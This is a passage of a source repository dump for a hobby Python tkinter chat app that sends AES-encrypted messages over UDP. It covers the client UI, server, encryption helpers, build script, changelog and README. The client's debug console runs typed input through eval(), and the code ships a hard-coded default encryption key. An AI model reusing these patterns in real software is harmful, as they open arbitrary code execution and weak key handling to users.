uname_btn_set.grid(row=1, column=1, sticky='EW')\n\n # Advanced\n def _reset_cfg():\n h.VMConfig.reset(1)\n _reload_uname()\n _hide_enc_key()\n self.refresh_color_scheme(refreshAll=True)\n h.create_log('Config file reset complete')\n\n frame_advanced = tk.LabelFrame(window, text='Advanced')\n adv_btn_resetConfig = tk.Button(frame_advanced, text='Reset To Defaults', command=_reset_cfg, height=1, relief=tk.FLAT, bg='#dfdfdf')\n\n frame_advanced.grid(row=0, column=1, sticky='NSEW', rowspan=10)\n adv_btn_resetConfig.grid(row=0, column=1, sticky='EW', padx=2)\n\n # Encryption settings\n def _set_enc_key():\n key = ekey_input_field.get()\n VMCrypt.set_key(key)\n _hide_enc_key()\n ekey_warning_label.config(text='Key was successfully set', fg='#009f00')\n\n def _show_enc_key():\n ekey_currentKey_label.config(text=f'Current Key: {h.VMConfig.get(1)[\"aes_key\"]}')\n\n def _hide_enc_key():\n ekey_currentKey_label.config(text='Current Key: ****')\n\n frame_encKeySettings = tk.LabelFrame(window, text='Encryption Key')\n ekey_warning_label = tk.Label(frame_encKeySettings, text='')\n ekey_currentKey_label = tk.Label(frame_encKeySettings, text='Current Key: ****', bg='#ffffff')\n ekey_btn_showCurrentKey = tk.Button(frame_encKeySettings, text='Show', command=_show_enc_key, height=1, relief=tk.FLAT, bg='#dfdfdf')\n ekey_input_field = tk.Entry(frame_encKeySettings, width=ENTRY_WIDTH)\n ekey_btn_set = tk.Button(frame_encKeySettings, text='Set', command=_set_enc_key, relief=tk.FLAT, bg='#dfdfdf')\n\n frame_encKeySettings.grid(row=1, column=0, sticky='NSEW')\n ekey_warning_label.grid(row=0, column=0, sticky='W')\n ekey_currentKey_label.grid(row=1, column=0, sticky='EW')\n ekey_btn_showCurrentKey.grid(row=1, column=1, sticky='EW')\n ekey_input_field.grid(row=2, column=0, sticky='E')\n ekey_btn_set.grid(row=2, column=1, sticky='EW')\n\n # Refresh theme\n # self.refresh_color_scheme(1) # TODO: Finish screen\n\n def show_debug_console(self):\n \"\"\"\n Show in-app console with actions logs.\n \"\"\"\n if hasattr(self, 'debug_console_showing'): return False\n\n def _handleConsoleInput(e):\n input_str: str = self.__debug_console_input.get()\n if input_str == 'clear':\n self.__debug_console_output.config(state=tk.NORMAL)\n self.__debug_console_output.delete(1.0, tk.END)\n self.__debug_console_output.config(state=tk.DISABLED)\n elif input_str == 'clear-chat':\n self.chat_messages.config(state=tk.NORMAL)\n self.chat_messages.delete(1.0, tk.END)\n self.chat_messages.config(state=tk.DISABLED)\n elif input_str == 'refresh-theme': self.refresh_color_scheme()\n elif input_str == 'polling-stop': self.messenger.stop_message_polling()\n elif input_str == 'test-raise': raise Exception('Test exception raised')\n elif input_str == 'version': h.create_log(f'Version: {h.VERSION}')\n elif input_str == 'updates-check': self.update_checker.check()\n elif input_str.startswith('eval'): eval(input_str[5:])\n else: h.create_log('No such command')\n self.__debug_console_input.delete(0, tk.END)\n\n def _on_close(window, obj):\n delattr(obj, 'debug_console_showing')\n obj.HM_Advanced.entryconfig(0, state=tk.NORMAL)\n std_redirect.disable()\n window.destroy()\n\n ui_window = tk.Toplevel(bg='#181818')\n ui_window.geometry('700x300')\n ui_window.title('Debug Console')\n ui_window.protocol('WM_DELETE_WINDOW', lambda: _on_close(ui_window, self))\n ui_window.columnconfigure(0, weight=1)\n ui_window.rowconfigure(0, weight=1)\n\n # Top\n self.__debug_console_FTop = tk.Frame(ui_window)\n self.__debug_console_FTop.columnconfigure(0, weight=1)\n 
self.__debug_console_FTop.rowconfigure(0, weight=1)\n self.__debug_console_output = tk.Text(self.__debug_console_FTop, bg='#262626', fg='white', font=h.VMConfig.get(1)['ui']['debug_console']['font'], state=tk.DISABLED)\n self.__debug_console_scrollbar = tk.Scrollbar(self.__debug_console_FTop, command=self.__debug_console_output.yview)\n self.__debug_console_output.config(yscrollcommand=self.__debug_console_scrollbar.set)\n self.__debug_console_FTop.grid(column=0, row=0, sticky=\"NSEW\")\n self.__debug_console_output.grid(column=0, row=0, sticky=\"NSEW\")\n self.__debug_console_scrollbar.grid(column=1, row=0, sticky=\"NS\")\n\n # Bottom\n self.__debug_console_FBot = tk.Frame(ui_window)\n self.__debug_console_FBot.columnconfigure(0, weight=1)\n self.__debug_console_FBot.rowconfigure(0, weight=1)\n self.__debug_console_input = tk.Entry(self.__debug_console_FBot, bg='#303030', fg='#00fa00', font='Consolas 10')\n self.__debug_console_input.bind('<Return>', _handleConsoleInput)\n self.__debug_console_FBot.grid(column=0, row=1, sticky=\"NSEW\")\n self.__debug_console_input.grid(column=0, row=0, sticky=\"EW\")\n\n self.HM_Advanced.entryconfig(0, state=tk.DISABLED)\n self.debug_console_showing = True\n\n # Redirect STD (-OUT && -ERROR) to debug console\n std_redirect = h_cl.RedirectSTD(self.__debug_console_output)\n\n\ndef startup():\n ui_root = tk.Tk()\n ui_root.title(h.APPDICT['client']['title'])\n h_cl.iconbitmap_universal(ui_root)\n ui_root.minsize(width=100, height=100)\n mainWindow = VM_MainWindow(ui_root)\n h.VMConfig.init(1)\n\n mainWindow.refresh_color_scheme()\n mainWindow.init_messenger()\n\n ui_root.mainloop()\n\n\ndef run_source():\n \"\"\" Startup from source code with poetry \"\"\"\n os.chdir(os.path.dirname(__file__))\n startup()\n\n\nif __name__ == '__main__':\n \"\"\" Built app startup \"\"\"\n os.chdir(os.path.abspath('.'))\n startup()\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 11.666666984558105, "blob_id": "3f13a2cbde9ef10b4733fe14891aa67ef18d5c7d", "content_id": "16d35c6756a6429273af16959dcc62cba20e13e1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "permissive", "max_line_length": 29, "num_lines": 3, "path": "/VectorMessenger/__init__.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\"\nVector Messenger main package\n\"\"\"\n" }, { "alpha_fraction": 0.637499988079071, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 21.85714340209961, "blob_id": "54f297ac6a4ebb43a40ab31aaa8e3f31e5008527", "content_id": "44f78a06e2dd542830062b762b87ccc649a76933", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "permissive", "max_line_length": 68, "num_lines": 7, "path": "/VectorMessenger/MessengerCore/MessengerBase.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import socket\n\n\nclass VMUDPBase:\n def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.settimeout(2.0)\n" }, { "alpha_fraction": 0.5980066657066345, "alphanum_fraction": 0.6611295938491821, "avg_line_length": 19.758621215820312, "blob_id": "68ea4f8bfb1ca5dc18f6913fd0cedfdff9f84385", "content_id": "10ade51a0d2bbd54403df482bfd346cb6335c148", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 602, 
"license_type": "permissive", "max_line_length": 44, "num_lines": 29, "path": "/pyproject.toml", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"vectormessenger\"\nversion = \"0.0.0\"\ndescription = \"\"\nauthors = [\"maximilionus <[email protected]>\"]\nlicense = \"MIT\"\npackages = [\n { include = \"./VectorMessenger\" }\n]\n\n[tool.poetry.scripts]\nclient = \"VectorMessenger.client:run_source\"\nserver = \"VectorMessenger.server:run_source\"\n\n[tool.poetry.dependencies]\npython = \">=3.7.0 <3.8\"\npyAesCrypt = \"^0.4.3\"\npillow = \"^7.2.0\"\npyinstaller = \"^3.6\"\npywin32-ctypes = \"^0.2.0\"\npefile = \"^2019.4.18\"\nujson = \"^3.1.0\"\n\n[tool.poetry.dev-dependencies]\nflake8 = \"^3.8.2\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n" }, { "alpha_fraction": 0.5871348977088928, "alphanum_fraction": 0.5894322395324707, "avg_line_length": 28.582523345947266, "blob_id": "87c5ec540bb4c7aeb35a6e6eef75a22b9ac94a7d", "content_id": "c88358a14138b7c9528346b2f9b0c116b4df1954", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3047, "license_type": "permissive", "max_line_length": 122, "num_lines": 103, "path": "/build.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\"\nThis script will build sources to executable file.\nOutput folder is: ./dist/\nIgnore folder ./build/\n\nRun with argument -h or --help to get more info\n\nScript available startup args:\n client - build only client. (output to ./dist/VM_Client)\n server - build only server. (output to ./dist/VM_Server)\n full - full VM build. (output to ./dist/*)\n\"\"\"\n\nfrom time import time\nfrom sys import platform\nfrom os import pathsep, path\nfrom argparse import ArgumentParser\n\nimport PyInstaller.__main__\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\n\n\nUPX = '--noupx'\nPATH_CLIENT_PY = './VectorMessenger/client.py'\nPATH_SERVER_PY = './VectorMessenger/server.py'\n\n\ndef build_client():\n # TODO: Exclude server-side\n icon = '--icon=./VectorMessenger/' + h.ICON_CLIENT_PATH[2:]\n\n HIDDEN_IMPORT = [\n 'pkg_resources.py2_warn'\n ]\n if platform != 'win32':\n # Fix of tkinter import for linux builds\n # ! Remove when legacy gui completely removed\n HIDDEN_IMPORT.extend(['tkinter', 'PIL._tkinter_finder'])\n HIDDEN_IMPORT = [('--hidden-import=' + arg) for arg in HIDDEN_IMPORT]\n\n ADD_FILES = [\n f'./VectorMessenger/data/ico{pathsep}./data/ico',\n f'./LICENSE{pathsep}.',\n ]\n ADD_FILES = [('--add-data=' + arg) for arg in ADD_FILES]\n\n PyInstaller.__main__.run([\n '--name={}'.format(\"VM_Client\"),\n *HIDDEN_IMPORT,\n '--windowed',\n *ADD_FILES,\n icon,\n UPX,\n PATH_CLIENT_PY\n ])\n\n\ndef build_server():\n # TODO: Exclude client-side and encryption modules\n icon = '--icon=./VectorMessenger/' + h.ICON_SERVER_PATH[2:]\n\n HIDDEN_IMPORT = [\n 'pkg_resources.py2_warn'\n ]\n HIDDEN_IMPORT = [('--hidden-import=' + arg) for arg in HIDDEN_IMPORT]\n\n ADD_FILES = (\n f'./VectorMessenger/data/ico{pathsep}./data/ico',\n f'./LICENSE{pathsep}.',\n )\n ADD_FILES = [('--add-data=' + arg) for arg in ADD_FILES]\n\n PyInstaller.__main__.run([\n '--name={}'.format(\"VM_Server\"),\n *HIDDEN_IMPORT,\n '--console',\n *ADD_FILES,\n icon,\n UPX,\n PATH_SERVER_PY\n ])\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"This utility will build Vector Messenger from source files. 
\"\n \"Result will be saved to directory: ./dist/\")\n parser.add_argument('mode', action=\"store\", default=\"full\", type=str, choices=[\"client\", \"server\", \"full\"], nargs=\"?\",\n help='Type of build. \"server\" - only server, \"client\" - only client, \"full\" - full build.')\n args = parser.parse_args()\n\n build_time_start = time()\n if args.mode == 'client':\n build_client()\n elif args.mode == 'server':\n build_server()\n else:\n build_client()\n build_server()\n\n print(f'\\n--- Vector Messenger build utility in mode \"{args.mode}\" ---'\n f'\\n> Built successfully in < {round(time() - build_time_start, 2)} > sec.'\n f'\\n> Output to \"{path.abspath(\"./dist/\")}\"')\n" }, { "alpha_fraction": 0.6925714015960693, "alphanum_fraction": 0.694857120513916, "avg_line_length": 24, "blob_id": "1abb06b9eaec2ed6876ef857dc0ed71ca8429f8b", "content_id": "9c40aebce0edbeb1ea30ed85b3b8e2cdd2cf2dd3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "permissive", "max_line_length": 91, "num_lines": 35, "path": "/VectorMessenger/server.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "from os import system as cmd, chdir, path\nfrom sys import platform as sysplatform\nfrom argparse import ArgumentParser\n\nfrom VectorMessenger.MessengerCore.Helpers.Global import APPDICT\nfrom VectorMessenger.MessengerCore.CoreServer import MessengerServer\n\n\nargs = None\n\n\ndef startup():\n if sysplatform == 'win32': cmd(f'title {APPDICT[\"server\"][\"title\"]}')\n MessengerServer(is_localhost=args.localhost)\n\n\ndef argparser():\n parser = ArgumentParser(description=\"Server launcher\")\n parser.add_argument(\"--localhost\", help=\"Run server on localhost\", action=\"store_true\")\n global args\n args = parser.parse_args()\n\n\ndef run_source():\n \"\"\" Startup from source code with poetry \"\"\"\n argparser()\n chdir(path.dirname(__file__))\n startup()\n\n\nif __name__ == '__main__':\n \"\"\" Built app startup \"\"\"\n argparser()\n chdir(path.abspath('.'))\n startup()\n" }, { "alpha_fraction": 0.5118155479431152, "alphanum_fraction": 0.5152737498283386, "avg_line_length": 34.408164978027344, "blob_id": "1d1186b96cd5acfc2aa19fb7a446249024a59da7", "content_id": "e45a2c8eaf93cf1271d6e3897d8ad575a694c0e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1735, "license_type": "permissive", "max_line_length": 113, "num_lines": 49, "path": "/VectorMessenger/MessengerCore/CoreServer.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import socket\nimport sys\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\nfrom VectorMessenger.MessengerCore.MessengerBase import VMUDPBase\n\n\nclass MessengerServer(VMUDPBase):\n def __init__(self, is_localhost=False):\n super().__init__()\n self.cfg = h.VMConfig.init(0)\n\n if is_localhost:\n h.create_log('Running server on localhost')\n ip = 'localhost'\n else:\n h.create_log('Running server on a global network')\n ip = ''\n\n self.sock.bind((ip, self.cfg['connection']['port']))\n self.clients = []\n self.__online = True\n h.create_log('Server is online')\n\n try:\n while self.__online:\n try:\n data, addres = self.sock.recvfrom(8192)\n except socket.error:\n pass\n else:\n h.create_log(f'Receiving data from {addres}')\n try:\n reg_code = data.decode('utf-8')\n except Exception:\n if addres in self.clients:\n for client in self.clients:\n 
self.sock.sendto(data, client)\n else:\n if reg_code == f'VM{h.VERSION}_REGISTER_USER' and addres not in self.clients:\n self.clients.append(addres)\n h.create_log('User registration request received. New address added to clients list')\n except (KeyboardInterrupt, SystemExit):\n self.stop_server()\n\n def stop_server(self):\n self.__online = False\n h.create_log('Shutting down the server')\n sys.exit()\n" }, { "alpha_fraction": 0.6580796241760254, "alphanum_fraction": 0.7298985123634338, "avg_line_length": 31.049999237060547, "blob_id": "2498197e40d603348cd58c24fd6dc592db2be358", "content_id": "5d9d8d9b1de5f08425c6cd3ef5e842c5b54a305a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1281, "license_type": "permissive", "max_line_length": 104, "num_lines": 40, "path": "/CHANGELOG.md", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "# **Vector Messenger** - Changelog\n> This changelog begins from `2020.07.01`. Any change before this date is not stated here.\n\n\n## Build [**B202008020120**](https://github.com/maximilionus/VectorMessenger/releases/tag/B202008020120)\n\n**2020-08-02**\n- Downgrade to python `3.7`\n- Allow only python `>=3.7` `<3.8`\n- Changed `cx-Freeze` build module to `PyInstaller`\n- Rewritten `build.py` script to fully support `PyInstaller`\n- Added ags handling to `build.py` with `argparse` module\n- Updated `.lock` file\n- Fixed paths handling for PyInstaller builds\n- `RedirectSTD` enhanced to be more easy to use\n\n**2020-07-22**\n- Run `update checker` thread as daemon\n- CamelCase to under_score\n\n**2020-07-21**\n- Removed `--log-messages` command from server-side\n\n**2020-07-14**\n- Removed `VMClient.png` from source again\n\n**2020-07-11**\n- Separated helpers to 'global' and 'client'\n- Removed build icons for platforms except win32\n- Optimized build script\n- Added command 'eval' to client debug console\n\n**2020-07-02:01-26**\n- Added changelog\n- Cross-platform icons implemented\n- Switch to `poetry run` system\n- Fixed run dirs for built and source code versions\n- Fixed `build.py` script deps\n- Remove `.png` icon from source. 
`ico` works perfectly.\n- Rename `compile.py` script to `build.py`" }, { "alpha_fraction": 0.47694703936576843, "alphanum_fraction": 0.49096572399139404, "avg_line_length": 29.283018112182617, "blob_id": "577569a035a6cf0374c531154b6f5aacfe068b48", "content_id": "fd43c05b85e31752295ae64067342bfcbf07333e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6420, "license_type": "permissive", "max_line_length": 120, "num_lines": 212, "path": "/VectorMessenger/MessengerCore/Helpers/Global.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\" Global helpers for client and server \"\"\"\n\nimport ujson as json\nimport os\nfrom datetime import datetime\n\n\n# CONSTS\nVERSION = \"B202008020120\"\nVERSION_UPDATE_API = \"https://docs.google.com/document/d/1jFWDZzJEPdsjs3JqcVKMfRzaFuz8VTrDc15JxsUJRUA/export?format=txt\"\nICON_CLIENT_PATH = './data/ico/VMClient.ico'\nICON_SERVER_PATH = './data/ico/VMServer.ico'\nCONFIG_DIR = './data/config'\nCONFIG_SERVER = 'config_server.json'\nCONFIG_CLIENT = 'config_client.json'\nDEF_AES_KEY = 'ChangeMeNOW'\nCONNECTION_PORT = 31635\nFORCE_IP = None\n\nAPPDICT = {\n 'client': {\n 'title': 'Vector Messenger',\n 'config_default': {\n 'username': 'Anonymous',\n 'aes_key': DEF_AES_KEY,\n 'connection': {\n 'ip': 'localhost',\n 'port': 31635\n },\n 'ui': {\n 'theme_selected': 'light',\n 'root': {\n 'font': 'Helvetica 14',\n 'theme_light': {\n 'text': '#000000',\n 'frame_bg': '#ffffff',\n 'chat_bg': '#ffffff',\n 'message_input_bg': '#ffffff',\n 'buttond_send_bg': '#dfdfdf',\n 'buttond_send_fg': '#000000'\n },\n 'theme_dark': {\n 'text': '#ffffff',\n 'frame_bg': '#181818',\n 'chat_bg': '#303030',\n 'message_input_bg': '#252525',\n 'buttond_send_bg': '#303030',\n 'buttond_send_fg': '#ffffff'\n }\n },\n 'settings': {\n 'theme_light': {},\n 'theme_dark': {}\n },\n 'debug_console': {\n 'font': 'Consolas 10'\n }\n }\n }\n },\n 'server': {\n 'title': 'VM Server',\n 'config_default': {\n 'connection': {\n 'port': 31635\n }\n }\n }\n}\n\n# Global Functions\n\n\ndef create_log(text: str, echo=False):\n \"\"\"\n Create log output to stdout or another function if ui_log defined\n\n Arguments:\n text {str} -- Log text\n\n Keyword Arguments:\n ui_log {function} -- Log function (default: {None})\n echo {bool} -- Return formatted log string without printing it (default: {False})\n \"\"\"\n if echo:\n return f'[{datetime.now().strftime(\"%H:%M:%S:%f\")}] {text}'\n else:\n print(f'[{datetime.now().strftime(\"%H:%M:%S:%f\")}] {text}')\n\n\n# Global Classes\n\n\nclass VMConfig:\n @classmethod\n def get(cls, conf_type: int) -> dict:\n \"\"\"\n Get the VM .json config as dict\n\n Arguments:\n conf_type {int} -- Type of config file (0 - Server, 1 - Client)\n\n Returns:\n dict -- Formatted .json as dict. 
__len__() == 0 if json not found.\n \"\"\"\n cfg_path = cls.getConfigPath(conf_type)\n if os.path.isfile(cfg_path):\n with open(cfg_path, 'rt') as f:\n cfg = json.load(f)\n if conf_type == 1 and FORCE_IP:\n cfg['connection']['ip'] = FORCE_IP\n return cfg\n else:\n return cfg\n else:\n return {}\n\n @classmethod\n def write(cls, cfg: dict, conf_type: int):\n \"\"\"\n Update json values from dict\n\n Arguments:\n cfg {dict} -- python dict to update from\n\n Keyword Arguments:\n conf_type {int} -- Type of config file (0 - Server, 1 - Client)\n \"\"\"\n cfg_path = cls.getConfigPath(conf_type)\n with open(cfg_path, 'wt') as configFile:\n json.dump(cfg, configFile, indent=4)\n\n @classmethod\n def reset(cls, conf_type: int):\n \"\"\"\n Reset config json to default values\n\n Arguments:\n conf_type {int} -- 0 - Server, 1 - Client\n \"\"\"\n cls.delete(conf_type)\n cls.init(conf_type)\n\n @classmethod\n def delete(cls, conf_type: int) -> bool:\n \"\"\"\n Running this method will completely delete json config\n\n Arguments:\n conf_type {int} -- 0 - Server, 1 - Client\n\n Returns:\n bool -- True - file was successfully removed, False - can't find file to remove\n \"\"\"\n cfg_path = cls.getConfigPath(conf_type)\n if os.path.isfile(cfg_path):\n os.remove(cfg_path)\n return True\n else:\n return False\n\n @classmethod\n def init(cls, conf_type: int) -> dict:\n \"\"\"\n Checks for .json config files existance and creates a new one if not exist\n\n Arguments:\n conf_type {int} -- Select type of config. 0 - Server, 1 - Client\n\n Returns:\n dict -- Returns config .json parsed to dict\n \"\"\"\n\n exist = False\n if conf_type == 0:\n if not os.path.isdir(CONFIG_DIR):\n os.makedirs(CONFIG_DIR)\n create_log('Created config dir')\n cfgserver_path = os.path.join(CONFIG_DIR, CONFIG_SERVER)\n if os.path.isfile(cfgserver_path):\n create_log('Config file was found')\n exist = True\n if not exist:\n cls.write(APPDICT['server']['config_default'], conf_type)\n return cls.get(conf_type)\n elif conf_type == 1:\n if not os.path.isdir(CONFIG_DIR):\n os.makedirs(CONFIG_DIR)\n create_log('Created config dir')\n cfgclient_path = os.path.join(CONFIG_DIR, CONFIG_CLIENT)\n if os.path.isfile(cfgclient_path):\n create_log('Config file was found')\n exist = True\n if not exist:\n cls.write(APPDICT['client']['config_default'], conf_type)\n create_log(f'Config file successfully generated < {os.path.abspath(cfgclient_path)} >')\n return cls.get(conf_type)\n\n @staticmethod\n def getConfigPath(conf_type: int) -> str:\n \"\"\"\n Will return config path\n\n Arguments:\n conf_type {int} -- 0 - Server, 1 - Client\n\n Returns:\n str -- Path to json config\n \"\"\"\n path = CONFIG_SERVER if conf_type == 0 else CONFIG_CLIENT\n cfg_path = os.path.join(CONFIG_DIR, path)\n return cfg_path\n" }, { "alpha_fraction": 0.5824403762817383, "alphanum_fraction": 0.5890079736709595, "avg_line_length": 33.03529357910156, "blob_id": "984300e05289022a5eac6bc908a3830e6a1fd448", "content_id": "7af7c1b25268510b5f053e125d48a11946c51186", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2893, "license_type": "permissive", "max_line_length": 104, "num_lines": 85, "path": "/VectorMessenger/MessengerCore/Helpers/Client.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\" Helpers for client-side \"\"\"\n\nimport sys\nfrom urllib import error as urllib_error\nfrom urllib import request\nimport json\nfrom PIL import Image, ImageTk\n\nfrom 
VectorMessenger.MessengerCore.Helpers import Global as h\n\n\ndef iconbitmap_universal(window: object, icon_image=h.ICON_CLIENT_PATH):\n \"\"\" Cross-platform icon loader for tkinter windows.\n\n Args:\n window (object): Tkinter window to apply icon to.\n icon_image (str)(Optional): Path to icon image.\n \"\"\"\n image_pil = Image.open(icon_image)\n image_tk = ImageTk.PhotoImage(image_pil)\n window.tk.call('wm', 'iconphoto', window._w, image_tk)\n\n\nclass RedirectSTD:\n def __init__(self, text_widget: object):\n \"\"\" Redirect STD(-OUT & -ERR) to tkinter Text widget.\n\n Args:\n text_widget (object): Tkinter Text widget.\n \"\"\"\n self.__text_widget = text_widget\n self.redirect()\n\n def redirect(self):\n sys.stdout = self.__STD2TK(self.__text_widget)\n sys.stderr = self.__STD2TK(self.__text_widget)\n\n def disable(self):\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n class __STD2TK:\n def __init__(self, text_widget):\n \"\"\" Low level redirect STD(-OUT & -ERR) to tkinter Text widget realisation.\n\n Args:\n text_widget (object): Tkinter Text widget.\n \"\"\"\n self.__text_widget = text_widget\n\n def write(self, string):\n self.__text_widget.config(state=\"normal\")\n self.__text_widget.insert(\"end\", f'{string}')\n self.__text_widget.see(\"end\")\n self.__text_widget.config(state=\"disabled\")\n\n\nclass UpdateChecker:\n \"\"\"\n VM Update checker. Currently it works with modifying tk.Menu bar label, so its kinda hardcoded, yes.\n \"\"\"\n def __init__(self, ui_ctrl):\n self.__U_NOUPDATES = '[ \\u2713 ]'\n self.__U_OUTDATE = '[ \\u2191 ]'\n\n self.__ui_ctrl = ui_ctrl\n\n def check(self):\n self.__ui_ctrl.entryconfig(4, label='Checking for updates \\u2B6E')\n try:\n h.create_log('Checking for updates')\n content = request.urlopen(h.VERSION_UPDATE_API).read().decode('utf-8')\n except urllib_error.URLError:\n self.__ui_ctrl.entryconfig(4, label=\"\")\n h.create_log(\"Can't check for updates. 
No connection to network or source unavailable\")\n else:\n if 'docs.google.com' in h.VERSION_UPDATE_API:\n content = content[1:]\n content = json.loads(content)\n if h.VERSION == content['version']:\n self.__ui_ctrl.entryconfig(4, label=f'Up-To-Date {self.__U_NOUPDATES}')\n h.create_log('Version is up to date')\n else:\n self.__ui_ctrl.entryconfig(4, label=f'Update Available {self.__U_OUTDATE}')\n h.create_log('Update is available')\n" }, { "alpha_fraction": 0.5967413187026978, "alphanum_fraction": 0.6003054976463318, "avg_line_length": 34.70909118652344, "blob_id": "254c1a8e5df31988d50a4f06f4826f4ddb048334", "content_id": "43c9446fd6c06d9820f4de3df61c88a511b46a3d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1964, "license_type": "permissive", "max_line_length": 136, "num_lines": 55, "path": "/VectorMessenger/MessengerCore/CoreClient.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import socket\nfrom threading import Thread\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\nfrom VectorMessenger.MessengerCore.MessengerBase import VMUDPBase\nfrom VectorMessenger.MessengerCore.Encryption import VMCrypt\n\n\nclass MessengerClient(VMUDPBase):\n def __init__(self, vm_client_ui=None):\n super().__init__()\n self.ui = vm_client_ui\n self.cfg = h.VMConfig.init(1)\n self.start_message_polling()\n\n def send_message(self, text=''):\n \"\"\"\n Send message to server\n\n Arguments:\n text {str} -- Text of message\n \"\"\"\n self.__refresh_config()\n message = VMCrypt.encrypt('@{}: {}'.format(self.cfg['username'], text))\n self.sock.sendto(message, (self.cfg['connection']['ip'], self.cfg['connection']['port']))\n\n def register_user(self):\n \" Register user on server \"\n self.__refresh_config()\n self.sock.sendto(f'VM{h.VERSION}_REGISTER_USER'.encode('utf-8'), (self.cfg['connection']['ip'], self.cfg['connection']['port']))\n\n def start_message_polling(self):\n def run_message_polling_thread():\n h.create_log('Message polling thread is active')\n while self.message_polling_enabled:\n try:\n data, _ = self.sock.recvfrom(8192)\n except socket.error:\n pass\n else:\n msg = VMCrypt.decrypt(data)\n self.ui.show_message(msg)\n h.create_log('Received message')\n h.create_log('Message polling thread was stopped')\n\n self.message_polling_enabled = True\n self.message_polling_thread = Thread(target=run_message_polling_thread, daemon=True)\n self.message_polling_thread.start()\n\n def stop_message_polling(self):\n self.message_polling_enabled = False\n self.sock.close()\n\n def __refresh_config(self):\n self.cfg = h.VMConfig.get(1)\n" }, { "alpha_fraction": 0.5943992733955383, "alphanum_fraction": 0.6124660968780518, "avg_line_length": 29.75, "blob_id": "efa81ab17e0f6eb51299ca19fa6c98ff4bffad96", "content_id": "83174bc42acda383bad9cfcf80ce3f2ff4eea3b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1107, "license_type": "permissive", "max_line_length": 105, "num_lines": 36, "path": "/VectorMessenger/MessengerCore/Encryption.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "from io import BytesIO\nimport pyAesCrypt\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\n\n\nclass VMCrypt:\n @staticmethod\n def encrypt(text: str) -> bytes:\n passwd = h.VMConfig.get(1)['aes_key']\n bufferSize = 128 * 1024\n text_bin = text.encode('utf-8')\n text_file = BytesIO(text_bin)\n 
result_file = BytesIO()\n pyAesCrypt.encryptStream(text_file, result_file, passwd, bufferSize)\n return result_file.getvalue()\n\n @staticmethod\n def decrypt(encoded_bytes: bytes) -> str:\n passwd = h.VMConfig.get(1)['aes_key']\n bufferSize = 128 * 1024\n encb_file = BytesIO(encoded_bytes)\n decb_file = BytesIO()\n\n try:\n pyAesCrypt.decryptStream(encb_file, decb_file, passwd, bufferSize, len(encb_file.getvalue()))\n except ValueError:\n return \"< Can't decrypt incoming message >\"\n else:\n return decb_file.getvalue().decode('utf-8')\n\n @staticmethod\n def set_key(key: str):\n cfg = h.VMConfig.get(1)\n cfg['aes_key'] = key\n h.VMConfig.write(cfg, 1)\n" }, { "alpha_fraction": 0.5539849400520325, "alphanum_fraction": 0.5575940012931824, "avg_line_length": 33.63541793823242, "blob_id": "073ad6537d7b67bd5d38aa580f010f6a9a9fd1ea", "content_id": "b28f41c38b592b664edde49987ce42ab423d5fd1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3325, "license_type": "permissive", "max_line_length": 269, "num_lines": 96, "path": "/README.md", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n\t<img src=\"./.github/VMLogo.png\" width=128><br>\n\t<b>Vector Messenger</b>\n</p>\n\n---\n- [Information](#information)\n- [Features](#features)\n- [Client](#client)\n - [Information](#information-1)\n - [Startup Args](#startup-args)\n - [Debug Console Commands](#debug-console-commands)\n- [Server](#server)\n - [Information](#information-2)\n - [Startup Args](#startup-args-1)\n- [Preparing Source](#preparing-source)\n - [For Development](#for-development)\n - [For Building](#for-building)\n- [Special Thanks](#special-thanks)\n\n---\n## Information\nSimple python-based ui application for network global chatting through UDP protocol. Source code can be launched and built <ins>only</ins> on `python 3.7`. This project was made just to understand how it all works, so don't expect it to be an 